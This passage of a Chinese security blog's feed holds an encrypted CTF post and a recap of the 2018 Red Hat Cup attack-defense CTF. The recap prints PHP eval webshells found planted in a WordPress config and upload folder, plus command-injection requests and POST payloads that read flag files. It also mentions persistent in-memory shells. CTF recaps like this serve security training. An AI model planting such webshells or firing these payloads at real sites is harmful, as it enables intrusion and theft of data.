164333f070f54ce34d421f0e3e79acad66f39e7aaca8b572b069b179718511ef26081999682d5e972322ffd14cff7120531cd1ad4e347b41320fb8f80d543fb0033b5ba2aca459aa5628838b503ca24450a386c4e1785666226e351a12868d4d7ecb0c611aee675aa8a2ff36d5289fa5fecb4c45eb4794dccee28d10c91e5fb6bc00b44b013daf25b288c5102d45596dd9dbbdedd9a542fed17c4cfe41864c686c927a44460204877bf61ad572a4593b785490607ea5d7bb1b32ce2a5ccc91567b41c98b371a5200349bfdaefecd32824711af03a6d4a1cc80f5606ec65c7870b5b41eb9c6e3637c540ef6510e9ba6cbd4308c9de74d2a12935c6556eb7c1356347caa58cfa6aadec2d7771284554bbe30edef6b7701297b4697facf6a9972b86eb3eb33e9621eef2c8cfb05105bcdf98332f442efeaed34b4e24ce6a0336368da2a1bcb177f9a6c89fb5a4dcb3931f2853f4515aa966e9f82adbf0c67f3b71c1fa041dd3bf21cdab43395bb601134240950f2e5bd14fed4cb8c1dd4a2e42bccf0b9134c09048a200184748e7113625fcb82aaf3cb81d4ba8fd01d2a0869b9914b9ac792aebeba549f53f282d7dff9686f0202d5c80418cc0581fc38f22c4b8fd28047169ef6ecc91054d293fd8975eff2f5cdc760eb95e809b426724e73aabae672ac981ac059abe4207b9362a33e9725f8d5a1f0129b70aa1753e564a78cec0138ea4bce563f04658cd23ad96e332be035501db958b418c0d99f568bd391f991913178a5b6975209697e3c4e9928147b87b6b5a2d4128eed7e3d3c6e3779faf9d8e73ec8c1150873bff26a8372fe5813500a78fdfde397bf07e5baf2cc24b1edc3200e48b192208aee77d0b6c20a20c20d229be6455a47e47fe82fb88b78c7a995bdf8ff577262127544e25915bf41eb562b475264861d697524183dca944774bc04a6945a6b75a66b376ff51b90edad87bafacec8cf3263a14bcce1040f5ce71ec46acccf90c5b11c160a614a60a48c0b339a257c5f8fd451174e081c659c5bf2bf60d2c2f42f22627bab79954a5c495698791a37a1974965bb517b30412a178e48efad9225da9190a60d1ac54319906250bd70a33c2fd965531634faf238ffe1de8e922542d5ae1f09854c27c6d4b89b9f32a227fa6af0019900e27aa48d029f253a91304e6c9748beaaa80ae03b26c1d4144cd40d8a558ca7df25153b9a2f31b2c5f4d8800e2b2ea6c6631743da8e49baa7d90d7ffc6901a645b111a65e004cbe2960fea46a50f0b1c061105f1c8842a9834b5a4c656ae5e22a92c3c0d45bd55c972fbeb3a74fd99efb1a61e8d875a4cdb1bb5022be8f60541e3b533d8d9b37b876152b5f5ea544acae9e7d920a4fb33ad87be02e9c0722f9705d14d6549547016f7ae354f050fca6bebb610916a0fec4dd89ce988757d4208c10082f1df89a1a15a9d6a3eefdd01ee48a94429e88856edf2933195a86ca0113e9517c465fa61a56457521406d59e9c85c37dae442c1e8477f8f5189ca17b2d31afc307a2cb3c9e527c472d16cb5a71d57d65bf55b614b6f0cf5df6963e9acdf11d4342627067760c403366cd1e61c4a5c33ae5f7ec44e008b745e74e49a676313b723c5fe60dd6ce25717ecbfd66cd7f22caa01bc97bc1d305dc40b73b4e333af0f645d8c559f0d547abff2b61bcab6f1222f67388338627de658aabfcc1b8fa44780c8ad8d0bbb6b2443d41f4a787f71b7a00fd9a4b68cb44b9a0d148e9751ff7cb5144c2654825fa5d48f05c26c51c550543e8c782af880f59e7ddc4eb45a8b5ccd9e808681bf8bcbbdbc0d3b2b88fe557e11c113352aa06b6bf93f69bee68a6309c6fb687f2473ba283172d5e68e6f32103a98f6b050e4e9f5afd5c61e99fbc6aefde7e492a47eb5735dd4d28d99f6a40b76aba233c84774881638e634257699f9a03437ba9552b71b0328ff8d70cc20c779883a70f9b492ebdfff36a4c3590c253433f2f642bf9bbd761c7f6f96ed3fadc09a666f2d2285aea8a66d0e9a68ec5d29d2d2260b402a507e4f7005aa24e315d1b16c492e98b645632781d0948f67f574b22461452e06e676892593d0e3fd042a8ac657766db7056b0e5286a54dd9cce9884b5258ca2806d6106efceadf5b3864c851738e9a0afde5512a6e8ad30fa88ee97838a6ffed8a8c31d5417ad40382b98c78304c9cc6f6c7b992360a75caf5c0087d5e0868afb6d303097b911b583e9d1efc9e3c270344681929a3146066168bfa9c058f83585713e7002099100a19150f0c141767ae4dde6662a23ce872c612ff74e16ccfe57a94f0f57f2359d5053f241016b2772e32d588e5180e1e009e4883bf43b98f0dcd11fd72c58857dd2c1442341f186b2dfe370792e50d3e345804c4d2e9955f3ccb60707c103cc62df3852f0bc70f3883dff24ca06bdaba7443e5ed8c1aacbf25077a5136f4d757209ad538c38fce24ea5a1b34c001a21efc2f60632f2d99cd5ab1f69f717615f8eb78af816954bd4f003d5588bfdda0ee938628926b3cda441694b6afbb00de5f45acbb49bdf59e0e0510382f819825fa92523a3eb4b504bc8b4e8bf6866a0d3afccf28687406874ea11d0627283c46c154b68b3dd099d0e23ede4028aae90181220462e6c222d82a518318ef4e61664e64430237f75e05e9f42fc2a47305f743d9556af21e3dba4c1f3eafa3cf7a338f000a20a60157432544dec4c44e3bbb16c2354de7c0b40e030550fe5e73da6f94c4f8f634b609d304588be0cf4d2535e56ae6d232ec6eff5cc83ccb4863ed87b95740e1c181fe0eefcd15fb79ea3660ea37a370216f4e2160ae866f84c58f741b193a65a4f49078b7637c8e363a5bb92fdb7a5efbe5ddea82edaa232795d79d82d73190c3f2b8af658f343dcd185e16eeeb8642a62859192ef6db4fe71ab90ec2d736792ef6c797d8772d57fb7a88e8bfe1d2445dfc363b4ee7bd25b1e4b4be18ee4f075403da098e734a17e54fe139cda3902a7d0c7b2fcc7e2146e5f9d287d17704b989b1c14ea445387298d898f5ed8ee6e54dea0d6520316adba5e7293474428417c54158a4fa70198de6ae6ed69bfe4c7f9f8bc2b4d0964da9e046c6c752922ac3f6c39368c615aac395a6451414b6bba55c1cb0a4f3474b26ef458c634eb4c30ea75090754f3ce1f441257407f66e410a77762150a11b91b1b4c80360fd39e2abd4aa52c27fd41635e62b1abff98f2e1a31ea0aba28b922869b5cbc3b9c85fccf763cd4a5acf6933b215b649138c73459122380a1e94b95cd4d9576b3a65adffc52ea4c5bf0e5c0f0b2f2726e68ee1d86f7fe6821bb498c82eac166496bbb8b1be5b2007fcf64e5039512f88f648035eeaff374fe3f9911b5890ccce616d43a505995a9ae9134deeecd5d49e25de0b1ddff35217dccd634b8f1bf8bfa24664c2db345172ae8807f7bc8b98a697e995c295dc5ccb84b2518c41f39c0887ab9f9f5df135f6b57f29051b20f3444dbf6bd6cf0d9502941d81d150d8043721c350e2adbc5ba33fac4955b50006c11ea233943db2e2fe2dfd81d31793d3aacd56fb888e2d7751b0f14c2079a5a36a76c88eabc0768a0d1aaa44f9090210d944ea104ddb22c5b2e373a6295a90a5b2c516f632b436e9af5d30f5dfc76a15c282b25c15e7e7bc6f5e417d87199bde5f6d380b28c6aa87079e42e6611b24fd1a11c9040540cf4e9bd82e084b2a88e16b5ecd86c14fdde5ef43dd521eccae2c03d326639e2d90075cb044689e15497d945bdbf74a0997c79db633e3ca87b4e1422af2529ce7e954e1be9ac24a4f1b47d7ea212839f2a2c49fc133823c902cd8c1c3e7a95f53e6448a0159c513391074403945b71e1ee44cd901b8d92c755a7706ffa12a724d777e884c91ad6afcf8b6bb80f773244ef6de49c061f6977a29ca7e1477a0386b0c951c0a43d488307b8876238c647a697d19233fff4b1582465d5cb829d2344968114bdcda6856b6d45bd325d91ca4310fd0887f6147ca573ccb901b74b472d62f62fdef3189f644cff04a24fda026d1deb4f4221a32082f28001e23c116f79836365bc26ea637e31933d8978fb26eb6b49a6ce5c4ed837e145666a8b6196e3b9cf4cf57abf66b04089495dba0dd6a9326ecf7aac6fb97d0e33ca502917505344f85bc0dc2b9865a61dc5bad03d0a4695d3d623a25dc3b95a77024d86af9b98212f0a75a0522a39946f6b2dc7940aa331c111faf4526d56aeb7b4f8760b75980acc41a36a1379b298e87cbecef90954a43d71a68abbc99a65eb88c17913da61cb31b40a3e354ba282de0544a93719a3717342d35ab47729368cc3abde57a36b1587974a6b5f19fa4676c21dee1f5fedbf7c903761014b268e526750209078859ee1398405064701f246870a0a7e5097ba49ec57105562f443a9a43908e5aeee362f662c253e82c1128ead2c6ef6d8d7664cf138c8364fb63291a83f0e1b69752214193b95d2b6fc9ad3db372ad7c5f0a0ad1ab4fec268d6989a98cc98e4248028a11400452b11447fae8ad90a9fbfabb7a92f9b18e907510f815828f6140e784350c452b9ad1a60d03f6d370c78618c8fbe71f9763019d8e132aa77b098fa95f5a020634e698a27a69155dbaa6f3dd7c34fdb2f04cd0bd693f416a144fd34a70a3b6e6cc44973f78562545e0ef8c553bfb09d41c5541a5b7597470f1998655af3fdbd4a7d441bc140b0ecdac45b20e1e1ce1d171bdec8f847d3b6707f64d9c9d013870add8f2168ca5fe206d04dcb29a8ae54dc2762dc6608c04769aefec0749d4ce33ec54d46441d93f35f0508cce9dde03f8478f4b853140680a83e25c9b285dd02c7c7eed1f7529934a7ec54acf0b40683488fc15c6331dffd1382cb8a1365425ad42b5882bd8c1f03ef7b554752b6e1345fca61fd4b722c89390fac346d380b248acb2ca056006b00c509503fc865395fcbc5116be92aace374892ef5330f8f5a5db1b591ad711a3b513c619dbfe8254e00d53ab88e3a89a2d13112e66184d1e599144df2cc00bd27f0737fba8b8d18ebd33cdc3166b999107bf9e7e1286065f9753f4b5c429b2a62b1e7c657e1747360af469504060c963dff8e2b2e4dc237e68fb82c42a62d1685278ab703c53969ac56f994e17c8da27dea0c3152fbd755adeb222a73faed12da321b58324b2313308fd120c2f75abf4d3e4e49298d727537c03b8eaf3490ea0a20e47dbda7a9b821201ca1a79e3c0fbd4c148998fc4b17ac17ac88c82f50a614f2f79ce97b706afaa3d96adc6d356c8b5e00baf9ec5de142dee4835f142714b4ad18cc6bda33cdc817e74aed3d2f2bb79fd0bb972361f5b5aff6d05cd56c55431767b392cf07c79b9a9af3cea6cf70ac138ce9207486f7d8b7b01be768ee09f6a194a3e4e8636678d3c4ee6ae6c23daa5c3a7a8b38ba19a91011c0b101ac0b2cc86852429ed7c08b9eacdf2fe46595bde09374266ba40494695e59a35de81837bc47a5735fd077273489c4ef7cd6dcd140ced239521b65598ee6725c2b914d27e87702b6a7b34c41d90da88c818d7b7dfb406687cdbbdb6ef05f944e9ecd3d4e3c81c41f591798c550a02ab7ec03a08262a8c27fe3dbc566d648b9cac1d8d15f07bddd32631a8be57d1d19f488b6b4bb25933471a27231b2c60f3db77725048f3ec75d3802cec140ed57307a12871d33a903e75b09afccf5fe280fa8d7f9f93024853061ee5b7a3346196891648e25ff1a8c63221fb8a69ed7bcf13848eb3fcfe0548acb1a0fb9dfae171b4e5235e910a88a3fd5e3fd342676a79ceec99a473afc172029f442a776cfd2b1c73cb8466be6e19718e63fdc8931f56b2adb03212e9ee733e3a3f860bc7144368440f386bd0be70203b5ec858d77de42bd8130851a0714029c5d2d9caff3b66c5f45b90c97b1ec421b385d20fb756effebbe1af49172a7533831492286b4a0a3b20bac7d72ffac8a1c962dab1a211899716e7cca2d0078627b0d19ff1721d0ec13cd5dcb1d099f17bc5e6b97c6a3e09a18539a61290e4d760d29e555a94f2b07769b43a1b2b1effbd37ed13c547f02e2962c676b6276be0ba06a02fd8124dfe8a33949fb6b2a194ee509803f8dba766067d53a1f9fd87e27130120a279ba97be288c75b8d0ebbfc670c1f8ccf868ffce47df5f98b165a883dde9670217a8ba365e08e47afae206fdff628802a37e2ed076787a09f184711a65583ebc1a4481cc6187dc7909bd583b209bf964cad193cc663c577064019712577ed8ef1322ba3f01b5b52ef311ee88f8ddd913eae9079757f4b11ad504b1b318c101cd3970f003763e6d4b572d582b46ab222582c4e71372e21b3c6b9f471985b8a370e780d68669e88d98f7f59a47079e7ae3d748d121713f788eeb3a01ac2395700acaad414141c63067ec3275dfd4faa836ac1c388af3c28939832d864e591100572a6dfd662c34c174be10535326c671e56afc8b702af15892513a46e4d42a70e9d9998773353674fc75a5d16d2fffcddffc9f611aaf2857b44694cd3bba3f2ad1249465a558aed1422b197b066ccb50811bce441ae767b47b05817f5cb1ee9a9736898fbc5754977751f2703793dcfde33fa450d03606f00c1256857062e60c88746ecd73b4a3407c04e1e702b80e25ae67880e9ee80baabd2af06c17b76f0d2cf1ac69f23da9755127b94b82148355951ea41039fa02ec925bc067963fad926bbff2274a3cedfdf0a34f19ac7e1982e79e6d39b768e7aaa99376753477987d206c2f4a4165b3dfebf200ab017a61a0018d498e6db23090fc512ec72a5b1095548fc1c406214d0767b3bd22f7a2252ee8422f72bcf9d48832f8a964036e46d53ceef9b53d8a956e25f766be3b2e7a68554e36f947b46e957a3ff052a6f5e255e564f201e822e1d651feb7c5b67807b85de9a5a337aff6cbb8d2ebcd7e3c913737ded96d1a3be6467c6e9a248f4ffc872558dc9223c729052d9ad62e09be284b4fa767dfde4e12f7f3c0deda84e827b7e94e3903a9794fc6178e3ff844e58161b04be9f2f8540f3492438532e1ed5f29b0a0adfb219e3d2f197123ba801cb2de810151d162235dc9a792a0a426039d3b6de9863c189f0c229bd35c87eccb386786e8ffb9bb28ae35b066031f2cc298053239c306d45185fde7daf93274bd03e773bc8a606f5ce172904db55202091db6988d1a7656042add721ef0fb68e626f37006481aca9413fa729f0bcfb7445cad1b4623f14e8c5e49e90618d05be11693a0b36da4116586cc2af93af4591438054e33c2f8b2636daeb33f244936a9068a2945559e521ed2a1d7ae4ed320852cea42a86b5ecd9d82939bc6c471f62aebecb6901a10c8b12521f43f8044053eefe2ba6c55e0a7cc7045b40392eea687d94aa7ff5acaa53857271550a494ff74fd29c70b998b5ed543c1fb70d34c1267423f2dd80026b9342d916705ad46eb8d0d743a76135b8bb12df3f2345edb07c163acd5c6e65908ade3d49d12fb2b9e4fd5145def3f8400af925f5e5ee34c6ad6a5c6f24d6f9895f69717db3441006e1d78570d695b102d491530fa6509dd9ea0c2bd5c610e865be18a0d7d8061522fbd1fc294f62732cde0513000232323eb763892ff092b4b4c355acf1028507ed8ab7ad92d2a83629418f35b72abc9a864f388a14daa96953f8b9061ca675e7d02d590328bb1cd2e4fec873a77a3ebbeae1932a53de0a31846a4903bdf251b986675b16f6d6db677d7286e6989bc50a381d25117cea1f3e37c85ee428b489b0e78bb621d516e738b17ccfb6d60ef5a4c3c3e57243f522368e6d348149918e8efed8019f412cf5a9abe1205d1120a404b6e5fe545f915cee35a097b3beceed0d1521c6b7d7aea43d3d26fffd61a9bce6587d42b86a5cc407f0426b0bbd996a85e68d1613c94a510926a4a502f2fa3a31bd8f0fbda44e015a8a1f2a8cdd2a592c3bcc21f6f50888c9f54fea8931884eb5c9b31d13a1420063c46c659c67ac2fc4c7454965ac315fe28d1b3548538e9b7564f15aab04d263077e4d4f9691c6d158fd3eaf1b46e67b933b57755e7ed0d8e6622304795d674740a97cbff34832492fe91e776f4d297eff3c9baf2389a767fb77471f11773e9b00866b2af87eb360d46cf36b859f424cf51569cd35ca3c8210dadee10a371d22ba8a0dde109a05e6b68d78f24fc99dad55f7d4df4567132e39216d823943b3c06110b46469b6573283ed24f91a2b649ddd7105c31cbe0df16287d06a5ab3ff58a2db760a57e8f9deeab359152e045d6e93bae80b5f931748b238f50c514568430778849ac34fcfec196cd6ad4edf613686c7fdfeb03d9aaae0009d16a8784d79cbfa0131b96495efd94d80f722b4ab26215ad69fdc727c7faf2f7795e666d3d03b240b152ee5d3ff5368d9313c536893556c997878767e825c895e0d85a42a1d1c6eda2cc6ab33832a811bf9be9d0254efdfa1ad71ec3304dd77162db00d98926b315294546f4bad1abcf7ea085556b08c1bfc173f7ece8738c0157477139c5ca839256834b2977a0cff05f37dcf039e2502b5a5e8f4feba1a20f1a10f79c6814d72eac3a4bcf1d37417948a543fd20782a61fed6167ab6a3cc63fd7fad92415d871a90086c3a2aa77820979436e082eb127579cc5ba2165fca61d75957cb44fc7157e819ca402e46792276d798aef156057858d5585664e9fe9e163a456fbd2f9a29eaa4ce1ef9e6b5494d8153aae325430fb9b0c5fd9cb519cf02dfb4d3ec4f2d07fc5d7548e59243daea2da4158fb2f509e6859934897bbba90871fff160f00f65dccd7e35611df9270b060885bc5a08b1807d4b11eb75627af9354132f586972ac3a11267cdebd824c98c288be9f860841964a054dabc853c597908ed901fdbcacb419b6c43adee965386578a9f492fb0d7c79bbccd6479ab9ae6c46aa2f0f52169ba573b3984ee6ea500b2de7177bce992c53c70853c9ecc91d52a5beda205cc9e5412ed3ca724cb09beee90568a3ded62974c56e1bb69986d3860b9273dbc8270e69e9f77a6f22f87e69836862a8d4e385e7f1060b4b55e6995b8d251cc2bc3b686f609c4cf76daac2966ca7b1505c4d56a2bad4c0bf2ef0f5c742a6cef271df5eb48ce8fc21e6edbfd586c59de776d5d6fab4b068b3b59ac15011a0e7807104d3b3140dba034e8165c9d33cd23a104092924d3ea3d531a2efd640efb65c5ad2522c40eb89fbe02bff9845a047fe2678f455624cbffe72a648b220cfeafa4681ca9a0fca2b76dfc65f96fee63b25b7b2cb5845854195e311483bfc85914771a8161bf1ff3838c74860132b3861635812b70d65dcd3a9ba886e433a431402cd7898a5d978850447531914cc5702b2ef335b49430e42cace72b668a901f595072b50be806fdfe94878b2f692032a80c4c5b4bd0e79b54f58a5c3e64cd5e4af2a69a4c22eeb5642f89b876a99763adae4322859f3887d11e6aff135d9f196478f0fd5583e8aa828852b16490e513187bd3ca89036f0c4e1bccbc1b9d066291dc1ca4202c001dbdce1e6e1e0cff75405fa5883409a79aa8fdaa864002a13caad72b8de97209c1d0d5811dd05bde589ecb5fe4bb0ee6752206650d806c08f3debb448f3cb67dc251292fb5c65671dacf756b10f539006921f11467983174d4e547e5b46ad2d9dc7c759ad94dca5487efecf072bf5e4aaddbacd11984b30067427e2c54fffae068031f8300a2770e312421f036bae57ed08ef875ae40df26b62e38f3fed6dcb62fd85da8ce5913cf32bdd904348c970df3769be7eb43d69c1cbba905ecc7c58ae01d3bed166e135d67584789a7631859a81dbe0e9acc5d3620ff5afb95ae4028f493fe8772a2c6bc0e5ce53016ec50cd52707eb625c398835eb47b2cfdd3869ab279bfc90c0e360de34e89db5ab6a22855ddfeadc9810b8aebcee10dc84b54085e92683d6853b02cdc9e3d29c31e494e1577db416aeeb1063c3b722156e8cba21e1c53677a759405e6887553af7828de022125a1215ce91fa3f99152376c799ed436fe9a03cb6c323f099cbe2a6ef3fbca00dadc3930643529e1df2f4dd84d1e64b67a0a9e8a10abde418c5917b696f5e0db2bbb0872b319aa9fe8368a91a1f4ed6a83270feb3583d09b5e1d0e132a721e89fafad2a2f63f999a70636b83a46568b719e33a3bae303314de438a6fcbeb577dc9d7e4e2c40db7eca2bbd741b65059985320c6c74af0648da93c85eb1657834af6971f71d694c32012f007308088b7e3aafc91607615daa7cafadea3a7140d7c5dc6fb570168e975b1ad036dc796d92c1222f313746c199749e5f5e0cfa118d68f28905b39f4bd6874a1024f769bcfd2f221f8daa34b8a8ac251ab657472a6389c95b62727b5dc2b9ff1f3c71cdf4b6caad0abaabf1f7dbf8dac0faea01104cc7a5ceb8d77074851113fdae4c1009492492df7f91f6b2a82643844ad3a56c3632867be9ba626029b35c138f2cbf97eb01cd9b00c363b957bebe1ab5e4f09db7ea87e29980b579eab6c122b830585ff4e519a977d2ecbd10df72d669792d6b57613d1408a4c7c71fb9b332dd937e2d96eea8e67ad5a7c97c8c304c530e9be9acebc69b4e27094796651fa09b48d17cb5b95303740c16c9849b73c1b08266b867f1b30475d629a262626528a718e4480b5b00e1c7824a3972c75262546b41a9b7b452f431a6cc94fd9ea6e4ffed1169775cbf4e582d4cdf655cdffe048681df57ba9a8875c45404f2d92db5e869c2807808d99c68f632f242c37260c45bfd794e47376d9a42aa446e2c8acf7194280e0c238648ec603661cfb3b65d371998c1d21c0c0296f59371934cd791326d55d55d6675ba088dd66b3cdc15a4ae0f1e7eb1bf6a10fa228ffb11f0b9b79f2a7c030332f5871e47f9ba70c5ad95e4d0367046c25f8d5ee225b31e10c084f875272adb498cb7a1ead152e54f2aac5749e1d85c50d10b90cde26e9c9ba3621a9e0de50760d472b5bc0b43e77c3fbc621ed21b3a1c323bfc5094dcb0bbc64630586d4ba48ef8976ff97a8b2eedd1155f3dc842eeab1d2fe16b14ec361d509261120455f3622c3129a0f95dfee2dc4f241389934712719bf4f6aa584ec7fd85a69b53af7c12ccfae429defbbc8280a4fdb789095ab8b1e6e41f88f116808e7d6bd8b070821b8b73088e86af791e2942799b9245e866ea602b7acf166fe62d95844caf9f4aa5c70c51c6e7617f353a35fbf0927e5fc514117334c65224a1b4594cb3a8a27f3243229e03058ce0e1525ee488e8339ca86745e63f0eb4af6f01f66e8e2200fecf4e7a9976bec6eeb8e36e44f484b930ea0839470e257a252b5e4ee932fdca97dcee8937b5ebdf020ea0f83d34c33ebbca8f76d611f64ff3e90e546d9f92826290d36e9aeda72cebd0960d0653fd11d8c69060a8c1c69f2fcbf328200676a8255b0ee9d5e084ee72eb52b0021bc8ef4a09198d3db2fefb35b86ae7f50f165364d0c4554462da0633eae3c932d57d6ecb2c4dec41693eb9252ba564ed04ebea133579390e88a268cd4e8a136b9017139cc9d581b8f17be9e4bbc3eae2b2626cd71b12ff0655229c78be079899dfcb9567d9af09c707de0bc37f27f7f5f09b707a0c4873803df16cb702fb79ed854ac739b57c3b1b943924f9edb2491c89720243342bc4d9d9ba5cebf5cc898dc600727512fc67faf8f5791f489b7435dd9f22f79635557a62d27b695dbf98d0513e6545315a9ced0a5630098f1c84aa69016949dadc499ddac831fdce145d28c515efa8744fd7d1c59396fef4204419c48d5253631ce71368315a07d99405ca92b49a892d0aa6aac7e8ebca7c2ad9e5a03041b8a6227dbaf50b846568fae6a77442292759816191452c330b39d0bc65e4d6a03392dbd4ce7989427230b33adc55cf8929ab5cd4bbdf4eafdf747f37780227a4820bf5ecced0b91c7e99307856cd40aea547edf6f051235d63dc9fec957f0fd3fe65dd159721e4b8c76101dc8b084333461ac475578eda82c64487811b9df94958f0992d30f6f01b8b80d71b7a8cfcf054275b9b7b8c56d5ddf857f797f2d2dce8cc687848715d9f7386c81a484ae9d44a75f989b4a56c9036b39f3f715a76a8c4252bdb16c5c7c152cd852885f76e859d6f7a6294c6ef12a52f7c1503a61971602b25ff37888dfd1402bfbdc70aa3ed6230ceea92d366ee41873c5c8031598261675bc638248d2877a500d3de56ef05aa78d8360a680f83cfe690c581e59211fda1dc5488cbca7b0b3cd008b528b4a7dbfaa71648884623684b7914007c2482e5dc4097dbd3bd23f5d407b33ffc9ff44d4b951039241c79f348e2b8a15b05a7638449b38bea0b0b5779c2279621872b15bbbc1ac32bb44098173691e8b14d965d1cbfc8499e105a71a4c61bd6ef52ef516b73a3b897d13877562b9515b77955ce2aeb13c26085c173dbca40e1473ecce3621ce901a1a785509eadd1f5389d7a96bc8b0ec43d894c2b984128ec42b85082ea0ad348b910207520b457b68ded12f04b71dd238fcdd91c47ba2d3bfc1621ce727d1ef6a5a9ea564f2e33c9d5de9ec1ece6cb06deff1f507ea202b2e2481d1da40fac9870759464e328b3c6db017c76b1a6daa56ab6aa9643352cb756e29073c14bdceb293c1c20fda6a3ffa8b093835423bce34cfaf37f5d995ae1dfa9bdc3e681511f85c87fd35a3711ab93334abce4577</script> <div class="hbe hbe-content"> <div class="hbe hbe-input hbe-input-default"> <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass"> <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass"> <span class="hbe hbe-input-label-content hbe-input-label-content-default">QAQ密码是什么啊!</span> </label> </div> </div></div><script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
<summary type="html">这是一篇加密的文章,需要输入密码阅读.</summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="php" scheme="https://cr4ckm3.top/tags/php/"/>
</entry>
<entry>
<title>红帽杯线下赛总结</title>
<link href="https://cr4ckm3.top/2018/05/28/redhat_awd/"/>
<id>https://cr4ckm3.top/2018/05/28/redhat_awd/</id>
<published>2018-05-27T16:00:00.000Z</published>
<updated>2019-08-30T10:00:41.103Z</updated>
<content type="html"><![CDATA[<h1 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h1><h2 id="正常思路:"><a href="#正常思路:" class="headerlink" title="正常思路:"></a>正常思路:</h2><p>连接ssh–>sftp打包网站备份–>找漏洞/内置后门–>修复漏洞/删除后门/利用漏洞批量获取flag–>批量自动提交</p><p>开始拿到服务器,发现是wp,就找配置文件。包含我的通防和log记录文件。<br>第一个一打开就是:<code>/var/www/html/wp-config.php</code><br>看到如下:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//第一行:</span></span><br><span class="line"><span class="meta"><?php</span> <span class="keyword">if</span>(md5(<span class="variable">$_POST</span>[a])===<span class="string">'一串MD5'</span>){show_source(<span class="string">'/flag'</span>);@<span class="keyword">eval</span>(<span class="variable">$_POST</span>[b]);} <span class="meta">?></span></span><br></pre></td></tr></table></figure><p>本以为是官方内置后门,但是32位的爆破又不太可能。。。所以后来也有人说是被人植入的后门。这速度快的。。。。惊了!</p><p>发现没有开放sftp协议以及没有权限执行tar打包文件。还可以利用scp命令进行ssh远程登陆文件拷贝。</p><p>然后在短短的几分钟内有人拿了一血。</p><p>尝试读取apache日志:<code>/var/log/apache2/access.log </code><br>发现<code>python-requests</code>的请求头。发现异常<br>请求uri:<br><code>/wp-content/upgrade/.web01.php?guo=d1and3ngzh3</code>(点灯者的shell)</p><p>所以到<code>/wp-content/upgrade/.web01.php </code><br>发现:<code><?php @eval($_POST['power']);?></code></p><p>所以抄答案即可拿到flag。<code>所以一开始就已经开始得分了</code>,记得当时没得分的排名时20,写完脚本,想自动提交时掉到30多,过程中很多轮一直没有提交flag,丢了很多分。这是最不应该的一点。<br>从一开始的50多支队伍的flag到最后只剩8支队伍。</p><p>后来还找到很多的 payload:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">web 1 wordpress </span><br><span class="line">/wp-content/upgrade/下有shell。</span><br><span class="line">/wp-config.php里有别人的shell。</span><br><span class="line">/wp-login.php有debug模式可以rce</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/wp-login.php?redirect_to=http%3A%2F%2F172.16.5.69%2Fwp-admin%2Ftools.php&reauth=1 HTTP/1.0" 200 3147 "/home/babyblog/flag/flag" "python-requests/2.18.4"</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/wp-admin/tools.php</span><br><span class="line"></span><br><span class="line">/wp-admin/tools.php?cmd=system(%22cat%20flag%22);</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"> /</span><br><span class="line"></span><br><span class="line">post:</span><br><span class="line">admin=system("cat /flag");</span><br></pre></td></tr></table></figure><h2 id="文件修改:"><a href="#文件修改:" class="headerlink" title="文件修改:"></a>文件修改:</h2><p><code>www-data</code>大于<code>ctfuser</code>的权限。所以ssh连上去的权限修改不了 www-data </p><p>发现没有权限修改被写进来的shell,都是’不死马+内存马’,所以不重启apache服务器是删不掉的。<br> 一个骚操作就是:利用他们的马,<code>写一个文件上传点</code>,然后再上传<code>同文件名</code>的正常的文件,替换掉有问题的文件。</p><h2 id="失误点"><a href="#失误点" class="headerlink" title="失误点:"></a>失误点:</h2><p>在写自动化脚本时出现SSL证书问题,导致浪费大量时间。最后加上(verify=False)忽略认证可解决。</p><p>主办方设置了3s 才能提交一次,这是另外失误的一点。</p><p>所以最后是每一轮都手动提交flag。。。(早知就一开始就收到提交了</p><h1 id="web2"><a href="#web2" class="headerlink" title="web2:"></a>web2:</h1><p>同事抓到log是finecms的cookie的反序列化漏洞。</p><p>把一个cookie反序列化payload给我,我在打web1+专心打代码+现场的音效有点大。没听到是web2的payload。所以拿去打web1了。= =。我的锅。</p><p>web2我们防的挺好的。就中途莫名down机一次。然后请求重置服务器,然后迅速补洞,就没丢过分了。</p>]]></content>
<summary type="html"><h1 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h1><h2 id="正常思路:"><a href="#正常思路:" class="headerlink" title="正常思路:"></summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="AWD" scheme="https://cr4ckm3.top/tags/AWD/"/>
</entry>
<entry>
<title>php文件包含</title>
<link href="https://cr4ckm3.top/2018/05/24/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"/>
<id>https://cr4ckm3.top/2018/05/24/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/</id>
<published>2018-05-24T03:00:00.000Z</published>
<updated>2019-08-30T10:00:42.323Z</updated>
